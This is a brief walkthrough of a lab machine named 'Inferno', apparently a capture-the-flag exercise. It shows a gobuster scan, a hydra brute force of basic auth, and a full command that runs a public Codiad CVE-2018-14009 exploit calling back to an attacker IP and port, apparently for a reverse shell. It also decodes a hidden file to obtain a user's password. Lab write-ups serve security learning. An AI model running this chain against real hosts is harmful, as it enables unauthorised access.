Inferno
// gobuster scan reveals /inferno directory
gobuster dir -u http://192.168.1.63/ -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -x conf,inc,zip,gz
it's using basic auth so decide to use hydra to brute force it
reveals admin, dante1
【CVE-2018-14009】 Codiad (2.8.4) RCE on Linux machine
https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit
had some issues with it being written in python2 but managed to run it in python3
note to use:
python3 codiad.py http://admin:dante1@192.168.1.63/inferno/ admin dante1 192.168.1.131 4444 linux
view files in /home/dante
cat .download.dat
// convert Hex to reveal the message (which also contains the pass for dante)
cat .download.dat | xxd -r -p && echo ''
dante:V1rg1l10h3lpm3
Last updated
Was this helpful?